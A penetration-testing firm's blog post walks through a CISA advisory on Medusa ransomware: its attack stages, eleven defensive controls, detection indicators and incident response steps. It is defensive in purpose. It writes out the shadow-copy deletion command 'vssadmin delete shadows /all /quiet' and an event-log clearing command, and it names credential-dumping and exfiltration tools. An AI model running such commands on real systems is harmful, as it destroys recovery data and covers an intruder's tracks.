Valtik Studios
Back to blog
EnterprisecriticalUpdated 2026-04-1213 min

Medusa Ransomware in 2026: CISA Advisory Walkthrough + The Defensive Baseline

CISA AA25-071A walked through. What Medusa actually does across initial access, privilege escalation, lateral movement, exfiltration, and encryption. The 11 technical controls that break the chain at multiple stages. Detection indicators mapped to specific TTPs. The incident response playbook for when you get hit.

Phillip (Tre) Bucchi headshot
Phillip (Tre) Bucchi·Founder, Valtik Studios. Penetration Tester

Founder of Valtik Studios. Penetration tester. Based in Connecticut, serving US mid-market.

# Medusa ransomware in 2026: CISA advisory walkthrough + the defensive baseline that still breaks the chain

CISA, FBI, and MS-ISAC published a joint advisory (AA25-071A) in March 2025 warning that the Medusa ransomware operation had hit more than 300 victims across critical infrastructure sectors. A year later, the campaign is still active and the target list keeps growing. Healthcare, manufacturing, education, legal, insurance. The TTPs haven't meaningfully changed. The defenses that would stop it haven't been deployed.

This post is what the advisory says, what Medusa actually does, and the specific technical controls that break each stage of the attack chain. Tested against real incident response casework. Not generic vendor marketing.

Who Medusa is

Medusa is a ransomware-as-a-service (RaaS) operation that emerged in June 2021 and has been continuously active since. Affiliates are vetted before being given access to the platform. The core operators are tracked as "Spearwing" by some threat intel vendors and are believed to be Russian-speaking.

Distinct from MedusaLocker (different operation) and Mirai-botnet-related Medusa malware (unrelated family).

Medusa runs a data-leak site ("Medusa Blog") where they publish stolen data from victims who refuse to pay. As of early 2026, the site lists more than 400 confirmed victims across a range of industries.

Ransom demands range from $100,000 to $15 million depending on victim size. Multiple public incidents show ransom reductions for quick payment.

The attack chain from the CISA advisory

Initial access

Two dominant vectors:

  1. Phishing. Spear-phishing emails with malicious attachments or links to credential harvesting sites. Specifically noted: exploitation of unpatched Microsoft Exchange servers (ProxyShell-style CVEs), Fortinet FortiOS vulnerabilities, and internet-exposed RDP.
  2. Initial access broker (IAB) purchases. Medusa affiliates buy access from IAB markets (credentials for VPN, RDP, or domain admin accounts).

The advisory specifically calls out exploitation of:

  • CVE-2024-1709 (ScreenConnect authentication bypass).
  • CVE-2023-48788 (Fortinet EMS SQL injection).
  • Various older Microsoft Exchange vulnerabilities.

Discovery

Once inside, Medusa operators use off-the-shelf tools for reconnaissance:

  • Advanced IP Scanner and SoftPerfect Network Scanner for LAN discovery.
  • AdFind, SharpHound/BloodHound for Active Directory mapping.
  • Nltest for domain trust enumeration.
  • PowerShell for host-level reconnaissance.

Characteristic of Medusa: they spend days to weeks inside the environment before deploying ransomware. Dwell time is purposeful. They want full AD compromise, backup destruction, and data exfiltration complete before the encryption stage.

Privilege escalation and credential access

  • LSASS dumping via Mimikatz.
  • DCSync attacks against domain controllers.
  • Kerberoasting to extract service account credentials.
  • Remote Registry hive dumping for stored credentials.

Medusa affiliates prefer "living off the land." Built-in Windows tools (PowerShell, WMI, Certutil, Bitsadmin) over custom malware. This reduces endpoint detection rates substantially.

Lateral movement

  • RDP with harvested credentials.
  • SMB file share access for data discovery.
  • PsExec, Impacket (specifically secretsdump.py, wmiexec.py) for remote command execution.
  • Cobalt Strike for command-and-control on beachhead hosts.

Defense evasion

  • Disable Windows Defender via Group Policy changes or PowerShell.
  • Clear Windows Event Logs.
  • Delete shadow copies with vssadmin delete shadows /all /quiet.
  • Uninstall or disable EDR agents where admin access is achieved.

Exfiltration

Stolen data is moved to attacker-controlled infrastructure via:

  • Rclone pushing to Mega, Backblaze, or dedicated attacker cloud storage.
  • FileZilla or WinSCP for FTP-based exfiltration.
  • PowerShell custom scripts for HTTP-based exfiltration to attacker web servers.

Exfiltration volumes from Medusa incidents typically range from tens of gigabytes to several terabytes. Healthcare incidents have seen exfiltration of patient records, internal communications, and financial records.

Encryption

Medusa uses AES-256 (via ChaCha20 in some builds) for file encryption. Files get .medusa extension. A ransom note is dropped (!!!READ_ME_MEDUSA!!!.txt) with instructions to contact the operators via Tor.

Encryption happens after exfiltration is complete. Double extortion is the standard: pay to decrypt AND pay to prevent publication.

The 11 technical controls that break the Medusa chain

Each of the following maps to one or more stages of the CISA-documented attack path. Deploy the full set and you break the chain in multiple places.

1. Patch the named vulnerabilities

Not aspirationally. With a specific deadline per CVE.

  • CVE-2024-1709 (ScreenConnect) — patch immediately if still running.
  • CVE-2023-48788 (Fortinet EMS) — patch immediately.
  • All Exchange Server on-premises — patch cadence must be monthly at minimum.
  • FortiOS, Fortinet SSL VPN, Citrix Gateway — patch within 14 days of vendor advisory.
  • Any internet-exposed remote access product (RDP gateway, SSL VPN, BIG-IP, etc.) — continuous patch monitoring.

2. Disable or tightly control internet-exposed RDP

If you have RDP listening on 3389 from the internet, you are a Medusa target. Options:

  • Remove it entirely. Use VPN or ZTNA.
  • If required, restrict via IP allowlist + MFA at the gateway.
  • Rate-limit connections per source IP.

3. Phishing-resistant MFA on privileged accounts

SMS and app-push MFA get defeated by AiTM phishing and MFA fatigue. Replace with FIDO2 / WebAuthn for:

  • Domain admins.
  • IT staff accounts.
  • Any account with privileged AD roles.
  • VPN access (where possible).

4. Block Mimikatz-family LSASS access

  • Enable Credential Guard on Windows 10/11 and Server 2019+.
  • Enable LSA Protection.
  • Deploy EDR with LSASS memory read alerts.
  • Limit domain admin login sessions to a small number of hardened jump hosts.

5. Protected Users group + selective Kerberos hardening

  • Add privileged accounts to the Protected Users group (prevents NTLM, restricts Kerberos TGT lifetime, disables delegation).
  • Set strong randomized passwords on service accounts (50+ characters) to make Kerberoasting outputs uncrackable.
  • Migrate service accounts to gMSAs (Group Managed Service Accounts) where possible.

6. Segmentation that actually contains lateral movement

  • Host firewalls denying inbound from peers (no workstation-to-workstation SMB/RDP).
  • Network segmentation between user VLANs, server VLANs, and OT/critical VLANs.
  • Jump servers as the only path to privileged infrastructure.
  • Tier 0 / Tier 1 / Tier 2 admin account separation (Microsoft's ESAE-lite pattern).

7. EDR with anti-tampering and cloud-delivered protection

  • Tamper protection enabled (cannot be disabled by admin credentials on the endpoint).
  • Cloud management plane (survives EDR agent uninstall via local admin).
  • Alert on PowerShell with encoded commands, WMI remote execution, and Impacket tool signatures.

8. Immutable backups

  • 3-2-1-1-0 backup strategy (three copies, two media types, one offsite, one immutable, zero errors after verification).
  • Object-lock on cloud backups (AWS S3 Object Lock, Azure immutable storage).
  • Backup account isolated from domain. Compromised AD cannot touch backup.
  • Quarterly restore tests.

9. Exfiltration detection

  • DLP or CASB monitoring for large outbound transfers to Mega, Backblaze, or suspicious cloud IPs.
  • Alert on Rclone, FileZilla, WinSCP process execution on servers.
  • Egress firewall allowlist on servers (servers should not make arbitrary outbound connections).

10. Log forwarding + retention

  • Windows Event Logs forwarded to SIEM with at least 90 days retention.
  • Domain controller logs include Kerberos events, account lockouts, admin role changes.
  • EDR logs forwarded independently of endpoint (survives log deletion).

11. Tabletop the Medusa scenario

Quarterly tabletop with executives, IT, legal, and comms:

  • Scenario: ransomware on a Friday evening. File shares encrypted. Backups partially destroyed.
  • Decisions to walk through: pay or not, notify customers when, hire which IR firm, cyber insurance claim process.
  • Identify gaps in plan. Fix before incident.

Detection indicators mapped to Medusa TTPs

Fire alerts on:

  • Creation of new domain admin accounts outside change windows.
  • vssadmin delete shadows execution on any host.
  • wevtutil cl (event log clearing) on any host.
  • PowerShell with -enc / encoded command flag on servers.
  • Rclone/FileZilla on servers.
  • AdFind, SharpHound, BloodHound process execution.
  • Mimikatz-family process names and hashes (well-known to EDR vendors).
  • LSASS memory read from non-system processes.
  • Ntdsutil execution on domain controllers.

What to do if you're hit

  1. Do not power off encrypted systems. Memory forensics can recover keys or artifacts.
  2. Isolate affected hosts. Network disconnect, not power off.
  3. Engage IR firm and legal counsel immediately. Before talking to the attacker.
  4. Notify cyber insurance carrier. Required for coverage.
  5. Preserve logs. Domain controllers, EDR, firewalls, cloud audit.
  6. Follow CISA's ransomware guide and StopRansomware.gov for government reporting requirements.
  7. Evaluate payment only under legal / IR firm / insurance coordination. OFAC compliance matters for some Medusa-adjacent affiliates.

What this means for your 2026 threat model

If you're in healthcare, education, manufacturing, or legal, Medusa is already enumerating your attack surface. The CISA advisory is a year old and the attack chain still works because the defenses listed above are hard, expensive, and culturally unpopular.

Valtik runs tabletops and technical assessments targeted at the ransomware-affiliated threat model specifically. If your last ransomware readiness exercise was more than 12 months ago or your backup restore test failed, you have work to do before the next wave.

Sources

  1. CISA AA25-071A Joint Advisory on Medusa Ransomware (March 2025)
  2. FBI Ransomware Guide
  3. StopRansomware.gov
  4. Medusa TTP analysis. Symantec Threat Hunter Team
  5. CISA Ransomware Readiness Assessment (RRA)
threat intelligenceransomwaremedusacisahealthcareincident responsedouble extortionraas

Want us to check your Enterprise setup?

Our scanner detects this exact misconfiguration. plus dozens more across 38 platforms. Free website check available, no commitment required.

Free Security CheckRequest Full Audit
Get new research in your inbox
No spam. No newsletter filler. Only new posts as they publish.
Related Services
HIPAA Security Assessment
Learn more →
Related Reading
Enterprise12 min
RansomHub: The Affiliate-Led Operation That Absorbed LockBit Crew
Post-Operation-Cronos, LockBit affiliates migrated. RansomHub became the largest operation by victim count in 2025 with explicit 90% affilia
Ransomware13 min
Inside a Ransomware Gang: HR Departments, Salaries, and Bonuses
Ransomware-as-a-Service operations like LockBit, BlackCat, and Cl0p run on affiliate economics. The business model evolution from ransomware
Ransomware33 min
Ransomware Defense: The Complete Playbook for 2026
Monday 3:47 AM. Your phone rings. Systems are down. A ransom note wallpapered across every server. This is the complete ransomware defense p